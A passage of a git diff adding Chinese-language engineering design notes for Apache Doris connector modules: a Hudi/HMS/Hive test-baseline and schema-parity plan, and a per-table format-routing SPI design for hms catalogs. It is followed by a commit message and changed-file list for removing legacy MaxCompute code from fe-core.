目标:为三个连接器模块建**测试基线** + 证 SPI hudi schema 输出与 legacy parity。 + +- `fe-connector-hms` / `fe-connector-hive`:**当前零测试**;`fe-connector-hudi`:已有 3 测试类(`HudiTypeMappingTest` / `HudiScanRangeTest` / `HudiPartitionPruningTest`)。 +- parity 要求(T07 验收 + HANDOFF):SPI `HudiConnectorMetadata` schema / column-type 输出 vs legacy `HiveMetaStoreClientHelper.getHudiTableSchema` + `HMSExternalTable.initHudiSchema`,**COW & MOR 各一**;覆盖 column_names / types **列集合 + 顺序 + casing**。Rule 9:测意图。 + +--- + +## Recon 结论(决定整个设计) + +### 1. parity 可行性 = **golden-value(唯一可行)** +- import-gate(`tools/check-connector-imports.sh`)只扫 `*/src/main/java` 且只禁 connector→fe-core 单向;**test 目录豁免**。但真正约束是 **Maven 依赖图**:`fe-core` 只依赖 `fe-connector-api`/`-spi`,**不依赖** 具体 `-hudi`/`-hms`/`-hive` 模块;连接器模块不依赖 fe-core。→ **无任何编译路径能同时见 legacy `HudiUtils` 与 SPI `HudiTypeMapping`**。直接跨模块 parity 断言不可行(除非新增依赖 = 架构倒退)。 +- → parity 用 **golden 值**:把 legacy `HudiUtils.convertAvroToHiveType` / `fromAvroHudiTypeToDorisType` / `initHudiSchema` 的契约读出,作为带 `file:line` 注释的 golden 常量,断言 SPI 复现。与 T02 `HudiTypeMappingTest` golden 断言 `toHiveTypeString` 一脉相承。 +- 测试栈:**JUnit 5 only,无 mockito/jmockit**;替身全手写(`FakeHmsClient` 先例)。checkstyle **禁 static import**。 + +### 2. COW/MOR schema = **type-agnostic**(关键简化) +- legacy(`HMSExternalTable.initHudiSchema:734-758`)与 SPI(`HudiConnectorMetadata.getTableSchema → avroSchemaToColumns:262`)都从**同一份 Hudi avro schema** 推导列表/名/类型,**零** COW/MOR 分支。COW/MOR 区别只在 **scan planning**(split 收集 + reader 格式:`HudiScanNode.canUseNativeReader` / `HudiScanPlanProvider.planScan:92`)。 +- → "COW & MOR 各一" **不需两份真实 Hudi 表 fixture**,降解为: + - (a) **一份纯 avro→column 变换**(真实 parity 面:名/序/类型/Hive 串/nullable),golden 对标 legacy 契约 —— COW≡MOR 恒等; + - (b) **`detectHudiTableType` 分类**(`HudiConnectorMetadata:301`,COW vs MOR vs UNKNOWN)—— metadata SPI 中唯一区分表型处,经 `getTableHandle` + `FakeHmsClient` 喂 `HmsTableInfo` 测。 + +### 3. legacy↔SPI 类型映射 = **逐类型一致**(recon 矩阵) +- `HudiTypeMapping.toHiveTypeString` ≡ `HudiUtils.convertAvroToHiveType`;`HudiTypeMapping.fromAvroSchema` ≡ `HudiUtils.fromAvroHudiTypeToDorisType`,**每个 avro 类型** Hive 串 + Doris 类型均一致。例外见下两 gap。 + +--- + +## 两处 parity gap + +### gap-1(confirmed)column 名 casing —— **当场修(用户签字)** +- SPI `avroSchemaToColumns:270` 用 `field.name()` **原样**;legacy 在 `HMSExternalTable:745` `toLowerCase(Locale.ROOT)`(**仅顶层列名**;嵌套 struct 字段名 legacy/SPI 均不降,保持一致)。 +- **修法**:`avroSchemaToColumns` 顶层列名改 `field.name().toLowerCase(Locale.ROOT)`,镜像 legacy:745。**仅顶层**,不动 `HudiTypeMapping` 嵌套 struct 名(两侧本就一致)。 +- **安全性**(已核):`ThriftHmsClient.convertFieldSchemas:303-304` 用 `fs.getName()` 不防御性降字,但 **Hive Metastore 自身存小写标识符** → HMS 来源的 partition key 名到手即小写。降 avro 路径列名 → 与小写 HMS partition key **对齐**(改善 `getColumnHandles:142` 对 mixed-case Hudi 表的匹配),**无回归**。 +- **明确缩界(Rule 12 不静默)**:`ThriftHmsClient` 源头的防御性降字(与 hive 模块共享)**不在 T07 改** —— 触碰 hive 行为属 P7/批 E。本场只对齐 hudi 的 metaclient-avro schema 路径。 + +### gap-2(open)Hudi meta-field 纳入 —— **登记 DV,推迟批 E** +- legacy `getHudiTableSchema:852` 调 `getTableAvroSchema(true)`;SPI `getSchemaFromMetaClient:235` 调无参 `getTableAvroSchema()`。`true` 很可能强制纳入 `_hoodie_*` meta 列;无参默认随 Hudi 版本/表配置(`populateMetaFields`)变。可能改变**列集合**。 +- 无真实 metaclient 不可单测判定(recon 未能从库源解析),且属 T03 同族(schema-evolution/field-id 已推批 E)。→ 记 **DV-008**,批 E 用真实 fixture 实证。本场 parity 测**不依赖该差异**(测纯 avro→column 变换,不经 metaclient)。 + +--- + +## Design(focused intent-driven set) + +### 模块 hudi(task 3) + +**改动(main)**: +1. `HudiConnectorMetadata.avroSchemaToColumns` 顶层列名 `toLowerCase(Locale.ROOT)`(gap-1 修),加 `import java.util.Locale`。 +2. `avroSchemaToColumns` 由 `private` 改 **package-private `static`**(仅可见性/static 化,**零行为变更**)——使测试可直接喂手造 avro record schema 断言完整列变换(名/序/类型/nullable)。`getSchemaFromMetaClient:236` 的静态调用不变。 + +**测试**: +- **扩 `HudiTypeMappingTest`**:补 `fromAvroSchema`→`ConnectorType` golden(**当前零覆盖**)——primitives / DATEV2 / DATETIMEV2(3/6) / DECIMALV3(p,s) / array / map / struct / nullable-unwrap / ENUM→STRING / multi-union→UNSUPPORTED。对标 legacy `fromAvroHudiTypeToDorisType`。 +- **新 `HudiSchemaParityTest`**(纯 avro,无 HMS):核心 parity 交付。 + - `avroSchemaToColumns(代表性 record)` → 断言 **小写列名 + 原序 + 每列 ConnectorType + nullable**(golden 注 legacy `initHudiSchema`/`HudiUtils` file:line)。 + - 同 schema 每列 `toHiveTypeString` = golden Hive 串(= legacy `colTypes`)。 + - **casing pin**:mixed-case avro 字段(如 `Amount`)→ 列名 `amount`(gap-1 修的回归网)。 + - javadoc 写明 **COW≡MOR schema 恒等**(变换是 schema 的纯函数,不取表型)。 +- **新 `HudiTableTypeTest`**(`FakeHmsClient`):`detectHudiTableType` 经 `getTableHandle` → COW(`HoodieParquetInputFormat` / `spark.sql.sources.provider=hudi`)、MOR(`...RealtimeInputFormat` / `realtime`)、UNKNOWN。= "COW & MOR 各一" 分类面。 + +### 模块 hms(task 4) + +- **新 `HmsTypeMappingTest`**(最高价值——`HmsTypeMapping` 是 hms+hive **共享** 的 Hive-类型串解析器,零测试,真解析逻辑):primitives(boolean/tinyint/smallint/int/bigint/float/double/string/date/timestamp/binary)、`char(N)`/`varchar(N)`(含无长度默认)、`decimal`/`decimal(p)`/`decimal(p,s)`(默认精度)、`array<>`/`map<,>`/`struct<:,:>`/嵌套、Options(timeScale / mapBinaryToVarbinary / mapTimestampTz)、`timestamp with local time zone`、unsupported→UNSUPPORTED、大小写不敏感。golden 值对标解析逻辑。 +- **缩界**:DTO 不可变/getter/config 常量等 ~60 低意图测**不做**(Rule 2/9),记为 backlog。 + +### 模块 hive(task 4) + +- **新 `HiveConnectorMetadataPartitionPruningTest`**:镜像 `HudiPartitionPruningTest` 测 `HiveConnectorMetadata.applyFilter`(T05 裁剪逻辑的 Hive 原型)。手写 `FakeHmsClient`。pin EQ/IN 裁剪、非分区谓词忽略、全/零匹配、unpartitioned。**javadoc 注明与 hudi 的结构性重复**(consolidation 信号,P7 处理)。 +- **新 `HiveFileFormatTest`**:`HiveFileFormat.fromInputFormat`/`fromSerDeLib`/`detect`/`isSplittable`——纯逻辑(drive BE reader 选择):parquet/orc/text/json 大小写子串匹配、SerDe 回退、inputFormat 优先、splittable。 +- **缩界**:`HiveTableFormatDetector`/`HiveTextProperties`/`HiveColumnHandle`/`HiveScanRange` 等记 backlog(择期或 P7)。 + +--- + +## Implementation Plan + +1. hudi:改 `avroSchemaToColumns`(降字 + package-private static)→ 扩 `HudiTypeMappingTest` → 新 `HudiSchemaParityTest` + `HudiTableTypeTest` → `mvn -pl ...-hudi -am test` 绿。 +2. hms:新 `HmsTypeMappingTest` →(先读 `HmsTypeMapping.java` 定 golden)→ test 绿。 +3. hive:新 `HiveConnectorMetadataPartitionPruningTest` + `HiveFileFormatTest` →(先读 `HiveConnectorMetadata.applyFilter` + `HiveFileFormat` + 各 handle builder)→ test 绿。 +4. 守门(每模块):`checkstyle:check`(单独跑)+ `bash tools/check-connector-imports.sh`。 +5. 文档同步(playbook §5.1 五步)+ DV-008 + commit。 + +--- + +## Risk Analysis + +- **gate 保持关闭**(`SPI_READY_TYPES` 不动);零 fe-core/BE/thrift 改动;唯一 main 改动 = hudi `avroSchemaToColumns`(降字 + 可见性),dormant、零 live 风险。 +- casing 修:已核 HMS 来源小写 → 无回归;缩界明确(不动 `ThriftHmsClient`/hive)。 +- golden 漂移:每 golden 注 legacy `file:line`,legacy 变则人工核(无跨模块编译耦合,这是 golden 法的固有代价,已登记)。 +- gap-2 不在本场测面,避免基于未判定语义写脆测。 + +--- + +## Test Plan + +### Unit Tests(本 task 交付) +- hudi:`HudiTypeMappingTest`(+fromAvroSchema) / `HudiSchemaParityTest` / `HudiTableTypeTest`。 +- hms:`HmsTypeMappingTest`。 +- hive:`HiveConnectorMetadataPartitionPruningTest` / `HiveFileFormatTest`。 +- 三模块编译 + checkstyle 0 + import-gate 通过;全绿。 + +### E2E / parity-vs-live +**推迟批 E**(gate 关,端到端不可触达;precedent DV-003):批 E 翻闸后用真实 COW/MOR fixture 实证 (a) schema 列集合/类型/casing vs legacy,(b) gap-2 meta-field 纳入,(c) BE name-match 精确性。**显式登记,不静默跳过(R12)**。 + +--- + +## Decisions / Deviations + +- **DV-008**(本场新增):SPI hudi `getTableAvroSchema()` 无参 vs legacy `(true)` 的 meta-field 纳入差异,推迟批 E 实证(同 T03 族)。 +- casing gap-1:**当场修**(用户签字),仅 hudi metaclient-avro 路径顶层列名;`ThriftHmsClient` 源头防御降字推 P7/批 E。 +- baseline:**focused**(用户签字);DTO/config/detector/textprops 等记 backlog。 diff --git a/plan-doc/tasks/designs/P3-T08-tableformat-dispatch-design.md b/plan-doc/tasks/designs/P3-T08-tableformat-dispatch-design.md new file mode 100644 index 00000000000000..6b43eb871e6a38 --- /dev/null +++ b/plan-doc/tasks/designs/P3-T08-tableformat-dispatch-design.md @@ -0,0 +1,137 @@ +# P3-T08 设计 — `tableFormatType` 分流消费(design-only,单 `hms` catalog 多格式路由) + +> 关联:[tasks/P3-hudi-migration.md](../P3-hudi-migration.md)(批 D / T08)、[D-005](../../decisions-log.md)(DLA 用 tableFormatType)、[D-019](../../decisions-log.md)(hybrid)、[HANDOFF 关键认知 3](../../HANDOFF.md)。 +> 直接输入:[research/spi-multi-format-hms-catalog-analysis.md](../../research/spi-multi-format-hms-catalog-analysis.md)(6-reader code-grounded recon,本场未重复 recon,只核读 load-bearing 锚点)。 +> 用户签字(AskUserQuestion,2026-06-05):M2 路由 = **方案 B(per-table SPI provider)** → 本场记 **[D-020](../../decisions-log.md)**。 +> **性质 = design-only**:不动 fe-core live 路径、不实现消费(实现 = 批 E/P7)、不碰 `SPI_READY_TYPES` / legacy / 非 hudi 连接器。 + +--- + +## Problem + +批 D 目标:写清**单个 `hms` catalog 如何按 per-table `tableFormatType` 把表路由到 HUDI/HIVE/ICEBERG**,明确 fe-core 的消费契约与 SPI seam,作为 (a) 模型落地(批 E/P7)的入口设计。 + +legacy 用 `HMSExternalTable.dlaType`(per-table tag)+ 处处 `switch(dlaType)` 实现"同一 hms catalog 多格式"。SPI 侧 **只复刻了 tag 的产生,没复刻消费**(research §1/§6①)。T08 = 设计这个消费。 + +--- + +## Recon 结论(load-bearing 锚点本场已核读,非沿用近似行号) + +### 1. keystone gap = `tableFormatType` 产而不用(firsthand 确认) +- `HiveConnectorMetadata.getTableSchema` per-table 探测并设 `ConnectorTableSchema.tableFormatType`(research §3.3,`HiveConnectorMetadata.java:134-154` / `detectFormatType:282-294`)——**产生端就位**。 +- 但 `PluginDrivenExternalTable.initSchema`(`PluginDrivenExternalTable.java:79-109`)拿到 `tableSchema` 后**只迭代 `getColumns()`**(`:96-105`)、返回 `SchemaCacheValue(columns)`(`:107-108`),**从不调 `tableSchema.getTableFormatType()`**——格式信号在 fe-core 边界丢弃。✅ 确认 research §6①。 +- `ConnectorTableSchema.getTableFormatType()`(`ConnectorTableSchema.java:58-60`)存在、是 final 不可变字段——载体就绪,缺消费。 + +### 2. 第二个 fe-core 消费缺口 = 身份/引擎名 per-catalog 而非 per-table(firsthand 新增) +- `PluginDrivenExternalTable.getEngine()`(`:195-215`)/ `getEngineTableTypeName()`(`:217-231`)**switch 的是 catalog type**(`jdbc`/`es`/`trino-connector`),多格式 `hms` catalog 一律落 `default`。→ 一个 hms catalog 里的 hudi/hive/iceberg 表对用户显示同一引擎名,与 legacy(per-table 引擎)不符。这是 M1 的第二处落点。 + +### 3. scan 侧 SPI 是 per-catalog 单 provider(firsthand 确认) +- `Connector.getScanPlanProvider()`(`Connector.java:40-42`)默认返 null、**per-catalog 一个**;`HiveConnector` 恒返 `HiveScanPlanProvider`(research §6③)。 +- 但 `ConnectorScanPlanProvider.planScan(session, handle, columns, filter)`(`ConnectorScanPlanProvider.java:62-66`,+5-arg limit 重载 `:82-89`)**入参带 per-table `ConnectorTableHandle handle`**——即 per-table 信息在 scan 规划时**可得**(handle 已携 `HiveTableHandle.tableType`)。这是 M2 三方案都能落脚的前提。 +- `ConnectorMetadata`(`ConnectorMetadata.java:37-44`)**当前无** `getScanPlanProvider(handle)`——方案 B 的新增点。 + +### 4. 关键拆解:M1(身份消费)⊥ M2(scan 路由) +本设计的核心分析贡献——keystone gap 拆成两个**可分离**子问题: + +| | M1 身份消费 | M2 scan 路由 | +|---|---|---| +| 是什么 | fe-core 读 `tableFormatType` 做 per-table **引擎名/表身份/information_schema** | 单 `hms` connector 为非-Hive 表产出 **Hudi/Iceberg scan plan** | +| 落点 | `PluginDrivenExternalTable`(initSchema 缓存 + getEngine 消费)| SPI seam(A/B/C 三方案分歧处)| +| 是否随 A/B/C 变 | **否**——三方案 M1 设计相同 | **是**——这是 D-020 的命题 | +| fe-core 是否需懂格式语义 | 否(opaque string,逐字上报)| 否(经 handle 路由,热路径不读字符串)| + +→ M1 在所有方案中一致;A/B/C 只在 M2 分歧。**这是把"keystone"可控化的关键**。 + +--- + +## 决策:M2 = 方案 B([D-020],用户签字) + +研究浮现三条互斥路由方案(research §8)。本场逐条 code-grounded 评估后由用户拍板 **B**: + +| 方案 | 机制 | SPI churn | fe-core 是否长格式分派 | 网关依赖代价 | 裁决 | +|---|---|---|---|---|---| +| **A** 连接器内 router | `Connector.getScanPlanProvider()` 返回一个 `planScan` 按 `handle.getTableType()` 委派的 router | **零**(现 SPI 即可,planScan 已带 handle)| 否 | hive→hudi/iceberg 依赖边 | 备选 | +| **B** ✅ per-table SPI provider | 新增 **backward-compat default** `ConnectorMetadata.getScanPlanProvider(handle)`;fe-core 优先用它、回落 `Connector` 的 | 一个 default 方法(D-009 合规)| 否 | 同 A(网关 impl 仍需多格式依赖)| **选定** | +| **C** fe-core 发现期分派 | fe-core 读 `tableFormatType` 建 format-specific 表对象(≈legacy DLAType→多态 DlaTable)| —(fe-core 侧)| **是**(与 import-gate/D-003/D-006 瘦 fe-core 北极星相悖)| — | 否决 | + +**B 选定理由**(用户决策):把 per-table 选 provider 升为**一等 SPI 契约**(最干净的 per-table 语义),优于 A 把路由藏进连接器 router;同时以**向后兼容 default 方法**落地(满足 [D-009]:本计划只新增 default、不破签名),不构成 breaking change。代价(网关 impl 需多格式依赖)A/B 同担,非 B 独有。C 因 fe-core 回退到 per-format 分派、违背瘦 fe-core 目标被否决。 + +> **与 D-005 的关系(须留痕)**:[D-005] 定"用 `tableFormatType` 区分 + fe-core 据此 dispatch 到对应 `PhysicalXxxScan`"。其**区分符**结论 D-020 完全沿用;但"dispatch 到 `PhysicalXxxScan`"措辞写于 2026-05-24,**早于 P1 的 scan-node 统一**(`visitPhysicalFileScan`→单 `PluginDrivenScanNode` + per-range format,P1-T03/T04)——SPI 路径已无 per-format `PhysicalXxxScan`。D-020 = 在统一后的 SPI 架构下**操作化** D-005 的区分符消费,scan dispatch seam 由"fe-core→PhysicalXxxScan"改为"`ConnectorMetadata.getScanPlanProvider(handle)`→per-table provider"。D-020 不推翻 D-005,是其机制细化。 + +--- + +## M1 设计 — `PluginDrivenExternalTable` 消费 `tableFormatType`(design-only) + +> fe-core 侧,**所有 M2 方案通用**。实现 = 批 E。 + +1. **缓存 per-table 格式(与 schema 同生命周期)**:`initSchema`(`:93` 之后)读 `tableSchema.getTableFormatType()`,随 schema 一并缓存。**推荐**新 `PluginDrivenSchemaCacheValue extends SchemaCacheValue`(plugin 私有,不污染其他 external table 的 `SchemaCacheValue`),携 `Optional tableFormatType`。备选:(b) 用时经 `metadata.getTableSchema(handle)` 重取(无状态但多 round-trip);(c) transient 字段(缓存淘汰/反序列化丢失,否决)。 +2. **身份/引擎名 per-table 化**:`getEngine()` / `getEngineTableTypeName()` 在 catalog type 为多格式族(如 `hms`)时,改用缓存的 `tableFormatType` 作 per-table 引擎名。**fe-core 保持格式无关**——`tableFormatType` 作 **opaque 连接器选定串逐字上报**(连接器选规范值),**禁止** fe-core 长出 `switch("HUDI"→...)`。 +3. **能力门控不进 fe-core**:legacy 按 dlaType 门控 time-travel/MTMV/snapshot;SPI 侧这些已是连接器职责(`ConnectorMetadata` MVCC default opt-out=T06、time-travel fail-loud=T04 在 `visitPhysicalHudiScan`)。→ M1 **不需要** fe-core 按格式门控,进一步减 fe-core 格式知识。 +4. **热路径不读字符串**:scan 路由走 M2(经 handle),**不**经 fe-core 读 `tableFormatType` 字符串再分支——M1 的 fe-core 字符串消费**仅服务身份/上报**,热路径零格式 switch。 + +--- + +## M2 设计 — 方案 B per-table provider seam(design-only) + +> 实现 = 批 E(+ iceberg 部分依赖 P6/M3)。 + +1. **SPI 新增**(`fe-connector-api`,backward-compat default): + ``` + // ConnectorMetadata + default ConnectorScanPlanProvider getScanPlanProvider(ConnectorTableHandle handle) { + return null; // 默认回落 per-catalog Connector.getScanPlanProvider() + } + ``` + 默认 null → 现有所有连接器(jdbc/es/trino/iceberg/独立 hudi/hive)**零影响**(满足 [D-009])。 +2. **fe-core scan 路径**(唯一 scan 侧改动):`PluginDrivenScanNode.getSplits()`(research `:356-378`)由 `connector.getScanPlanProvider()` 改为**优先** `metadata.getScanPlanProvider(currentHandle)`、为 null 时**回落** `connector.getScanPlanProvider()`(保留现行为)。 +3. **hms 网关实现**:注册 `"hms"` 的连接器 override `getScanPlanProvider(handle)`,按 `handle.getTableType()`(`HiveTableType{HIVE|HUDI|ICEBERG|UNKNOWN}`)返 Hive/Hudi/Iceberg provider;metadata 侧同理委派 `Hudi/IcebergConnectorMetadata`。→ 引入 hms-网关模块对 `-hudi`/`-iceberg` 的依赖边(A/B 同担的结构代价)。 +4. **per-range 格式仍是 BE 选 reader 的最终依据**:各 provider 产出的 `ConnectorScanRange.getTableFormatType()`(Hive→`"hive"`/Hudi→`"hudi"`)→ `TTableFormatFileDesc.setTableFormatType`,BE 每 range 建对应 reader(与 legacy 等价,research §3.4 / 批 0 结论)。M2 只决定"哪个 provider 规划 split",per-range 契约不变。 + +--- + +## 边界 / 缩界(Rule 12 不静默) + +- **本场零代码**:以上 M1/M2 均设计,**不动** fe-core/SPI/连接器任何 live 文件。 +- **Iceberg-on-hms 经 SPI 依赖 P6/M3**:`fe-connector-iceberg` 现**无 `ScanPlanProvider`** 且 pom **未依赖 `fe-connector-api`**(research §6④/§2.3)。B 的 `getScanPlanProvider(handle)` 对 ICEBERG 表落地需 P6 先补 `IcebergScanPlanProvider` + api 依赖。批 E/P7 落地 hms 多格式时:ICEBERG 表在 P6 前**回落 legacy `IcebergScanNode` 或 fail-loud**,不静默误扫为 Hive。 +- **格式探测共享化(M5)非本场**:fe-core `HMSExternalTable.makeSureInitialized` 与 SPI `HiveTableFormatDetector` 两份逻辑的 drift 防护(抽共享层)留 P7。 +- **gate 不动**:`SPI_READY_TYPES` 不含 hms/hudi/iceberg(`CatalogFactory.java:52`),整族走 legacy;B 落地后仍需批 E 翻闸 + cutover + image 兼容(R-001)。 + +--- + +## Implementation Plan(批 E/P7,非本场) + +> 登记依赖序,供批 E 接手;本场不执行。 + +1. **M1**:`PluginDrivenSchemaCacheValue` + `initSchema` 缓存 `tableFormatType` + `getEngine/getEngineTableTypeName` per-table 化(fe-core,opaque 串)。 +2. **M2-SPI**:`ConnectorMetadata.getScanPlanProvider(handle)` default null(`fe-connector-api`,default 方法)。 +3. **M2-fe-core**:`PluginDrivenScanNode.getSplits` 优先 metadata-per-table provider、回落 connector-per-catalog。 +4. **M2-网关**:hms 连接器 override `getScanPlanProvider(handle)` + metadata 委派;加 `-hudi`/`-iceberg` 依赖边。 +5. **M4**:hms 探测为 HUDI 的表交 Hudi 路径(+ ICEBERG 待 P6/M3)。 +6. **翻闸/cutover/删 legacy/集群验证**:T09–T11(批 E),含 image 兼容(R-001)。 + +--- + +## Risk Analysis + +- **本场零 live 风险**:design-only,gate 关,无代码改动。 +- **B 的 SPI 表面演进**:新 default 方法是向后兼容(D-009),但把"scan provider 来源"从 per-catalog 单点变为 per-table 优先+回落,**所有连接器的 scan plumbing 经此分叉**——批 E 实现时需回归全连接器(jdbc/es/trino 走 null 回落路径必须等价)。已登记。 +- **网关依赖边**:hms→hudi/iceberg 耦合模块 build/release(A/B 同担);批 E 落地前评估是否反而触发 M2 的 (A) 更轻。**本设计记录 B 为方向,实现期可据 iceberg 接入复杂度复核**(D-020 关联 open question)。 +- **D-005 机制措辞陈旧**:已在 D-020 留痕 supersede,避免下游按 `PhysicalXxxScan` 旧措辞误实现。 + +--- + +## Test Plan + +- **本场无单测**(design-only,零代码)。 +- **批 E 落地时**(登记,R12 不静默跳过): + - fe-core 单测:`PluginDrivenExternalTable` per-table `getEngine` = 缓存 `tableFormatType`;多格式 hms catalog 下 hudi/hive/iceberg 表引擎名各异。 + - SPI 回归:现有连接器(jdbc/es/trino)`getScanPlanProvider(handle)` 返 null → 回落 per-catalog provider,行为等价(防 B 的 plumbing 分叉回归)。 + - 端到端(翻闸后):单 hms catalog 混合 Hive+Hudi(+Iceberg) 表,per-table 走对的 scan/reader,vs legacy parity。 + +--- + +## Decisions / Deviations + +- **[D-020]**(本场新增,用户签字):M2 路由 = 方案 B(`ConnectorMetadata.getScanPlanProvider(handle)` per-table default),design-only,实现批 E/P7。**细化 D-005**(沿用 tableFormatType 区分符;机制由"fe-core→PhysicalXxxScan"更新为 per-table provider seam,因 P1 已统一 scan-node)。 +- 无新 DV:B 与 D-005/D-009 一致,D-005 机制措辞更新已收于 D-020 留痕(非偏差,是决策细化)。 +- Open(转批 E/P7,承自 research §10):Iceberg-on-hms 委派 vs 回落 legacy(依赖 P6/M3);连接器生命周期双创建(`PluginDrivenExternalCatalog:87-145`,`HmsClient` 是否重复建);探测 drift 共享化(M5)。 From 73832991962abec94f13496ee8ae65447b0049fc Mon Sep 17 00:00:00 2001 From: "Mingyu Chen (Rayner)" Date: Tue, 9 Jun 2026 17:23:08 +0800 Subject: [PATCH 006/128] [refactor](connector) P4 maxcompute: remove legacy subsystem from fe-core + make fe-core odps-free (T07-T09) (#64300) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up to #64253 (the MaxCompute catalog-SPI cutover). After the cutover a `max_compute` catalog deserializes to `PluginDrivenExternalCatalog` and no legacy `MaxComputeExternal*` object is ever instantiated, so the legacy MaxCompute subsystem in fe-core is dead code. This removes it and makes fe-core's dependency tree fully odps-free. **1. Remove legacy subsystem** (`7a4db351100`) - Delete 20 fe-core files: `datasource/maxcompute/*` (incl. `MCTransaction`, `MaxComputeScanNode`/`Split`), the MaxCompute sink/insert/txn plumbing, and 2 legacy-only tests. - Clean ~21 reverse-reference sites (imports + dead `instanceof`/visitor/rule branches), keeping every `PluginDriven`/connector sibling branch and the image/replay keep-set (GsonUtils compat strings; `TableType`/`TransactionType`/`TableFormatType`/`InitCatalogLog.Type` `MAX_COMPUTE` enums; block-id thrift). - Rewire 3 tests; e.g. `FrontendServiceImplTest`'s block-id RPC test now mocks the generic `Transaction` SPI, since `getMaxComputeBlockIdRange` reads the PluginDriven connector transaction. **2. Make fe-core odps-free** (`409300a75b8`) - Drop the two odps deps from `fe-core/pom.xml`. - Move `MCUtils` from fe-common into `be-java-extensions/max-compute-connector` (its only consumer after the removal); keep `MCProperties` (odps-free constants) in fe-common. - Drop `odps-sdk-core` from fe-common — it was also leaking netty/protobuf transitively to fe-common's own `DorisHttpException`/`GsonUtilsBase`, so declare `netty-all` + `protobuf-java` directly (proper dependency hygiene). **3. Doc-sync** (`f8c305765e8`) — plan-doc PROGRESS/HANDOFF/deviations/design tracking notes. - `mvn -pl :fe-core -am test-compile` (main+test) passes; checkstyle 0 violations; connector import-gate passes. - `grep -rn com.aliyun.odps fe/fe-core/src` → empty. - `mvn -pl :fe-core dependency:tree | grep odps` → empty (no odps, direct or transitive). 🤖 Generated with [Claude Code](https://claude.com/claude-code) --------- Co-authored-by: Claude Opus 4.8 (1M context) --- .../org/apache/doris}/maxcompute/MCUtils.java | 4 +- .../maxcompute/MaxComputeJniScanner.java | 1 - .../doris/maxcompute/MaxComputeJniWriter.java | 1 - .../preload-extensions/pom.xml | 12 + fe/fe-common/pom.xml | 24 +- .../apache/doris/connector/api/Connector.java | 9 + .../connector/api/ConnectorCapability.java | 31 + .../doris/connector/api/ConnectorColumn.java | 27 +- .../connector/api/ConnectorSchemaOps.java | 21 + .../doris/connector/api/ConnectorSession.java | 26 + .../connector/api/ConnectorWriteOps.java | 26 + .../api/handle/ConnectorTransaction.java | 44 + .../api/handle/ConnectorWriteHandle.java | 50 ++ .../api/scan/ConnectorScanPlanProvider.java | 85 ++ .../api/write/ConnectorSinkPlan.java} | 28 +- .../api/write/ConnectorWritePlanProvider.java | 44 + .../connector/api/ConnectorColumnTest.java | 99 +++ ...onnectorScanPlanProviderBatchScanTest.java | 95 ++ .../maxcompute/MCConnectorClientFactory.java | 11 +- .../connector/maxcompute/MCTypeMapping.java | 95 +- .../MaxComputeConnectorMetadata.java | 503 ++++++++++- .../MaxComputeConnectorProvider.java | 109 +++ .../MaxComputeConnectorTransaction.java | 231 +++++ .../maxcompute/MaxComputeDorisConnector.java | 157 +++- .../MaxComputePredicateConverter.java | 84 +- .../MaxComputeScanPlanProvider.java | 222 ++++- .../maxcompute/MaxComputeTableHandle.java | 24 + .../MaxComputeWritePlanProvider.java | 233 +++++ .../maxcompute/MCTypeMappingTest.java | 92 ++ .../MaxComputeBuildTableDescriptorTest.java | 95 ++ ...omputeConnectorMetadataCapabilityTest.java | 75 ++ ...MaxComputeConnectorMetadataDropDbTest.java | 211 +++++ .../MaxComputeConnectorMetadataIsKeyTest.java | 79 ++ .../MaxComputeConnectorProviderTest.java | 372 ++++++++ .../MaxComputeConnectorTransactionTest.java | 137 +++ .../MaxComputePredicateConverterTest.java | 267 ++++++ .../MaxComputeScanPlanProviderTest.java | 345 ++++++++ .../maxcompute/MaxComputeScanRangeTest.java | 231 +++++ .../MaxComputeValidateColumnsTest.java | 107 +++ .../OdpsClassloaderIsolationTest.java | 151 ++++ .../maxcompute/OdpsLiveConnectivityTest.java | 66 ++ fe/fe-core/pom.xml | 27 +- .../connector/ConnectorSessionBuilder.java | 7 + .../doris/connector/ConnectorSessionImpl.java | 22 + ...eTableInfoToConnectorRequestConverter.java | 9 +- .../doris/datasource/CatalogFactory.java | 10 +- .../datasource/ConnectorColumnConverter.java | 12 +- .../doris/datasource/ExternalCatalog.java | 16 +- .../datasource/ExternalMetaCacheMgr.java | 8 - .../PluginDrivenExternalCatalog.java | 187 +++- .../datasource/PluginDrivenExternalTable.java | 162 +++- .../datasource/PluginDrivenScanNode.java | 263 +++++- .../PluginDrivenSchemaCacheValue.java | 64 ++ .../doris/datasource/hive/HMSTransaction.java | 15 + .../iceberg/IcebergTransaction.java | 15 + .../datasource/maxcompute/MCTransaction.java | 240 ------ .../maxcompute/MaxComputeExternalCatalog.java | 524 ----------- .../MaxComputeExternalDatabase.java | 47 - .../MaxComputeExternalMetaCache.java | 115 --- .../maxcompute/MaxComputeExternalTable.java | 347 -------- .../maxcompute/MaxComputeMetadataOps.java | 565 ------------ .../MaxComputeSchemaCacheValue.java | 67 -- .../maxcompute/McStructureHelper.java | 298 ------- .../maxcompute/source/MaxComputeScanNode.java | 814 ------------------ .../maxcompute/source/MaxComputeSplit.java | 47 - .../ExternalMetaCacheRouteResolver.java | 6 - .../analyzer/UnboundConnectorTableSink.java | 45 +- .../analyzer/UnboundMaxComputeTableSink.java | 117 --- .../analyzer/UnboundTableSinkCreator.java | 13 +- .../translator/PhysicalPlanTranslator.java | 44 +- .../processor/post/ShuffleKeyPruner.java | 15 - .../TurnOffPageCacheForInsertIntoSelect.java | 8 - .../properties/RequestPropertyDeriver.java | 12 - .../apache/doris/nereids/rules/RuleSet.java | 3 - .../nereids/rules/analysis/BindSink.java | 135 ++- .../rules/expression/ExpressionRewrite.java | 9 - ...ableSinkToPhysicalMaxComputeTableSink.java | 48 -- .../plans/commands/ShowPartitionsCommand.java | 51 +- .../plans/commands/info/CreateTableInfo.java | 36 +- .../insert/InsertIntoTableCommand.java | 43 +- .../insert/InsertOverwriteTableCommand.java | 36 +- .../plans/commands/insert/InsertUtils.java | 7 +- .../insert/MCInsertCommandContext.java | 84 -- .../commands/insert/MCInsertExecutor.java | 84 -- .../PluginDrivenInsertCommandContext.java | 23 +- .../insert/PluginDrivenInsertExecutor.java | 116 ++- .../logical/LogicalMaxComputeTableSink.java | 156 ---- .../physical/PhysicalConnectorTableSink.java | 92 +- .../physical/PhysicalMaxComputeTableSink.java | 156 ---- .../trees/plans/visitor/SinkVisitor.java | 15 - .../apache/doris/persist/gson/GsonUtils.java | 17 +- .../doris/planner/MaxComputeTableSink.java | 113 --- 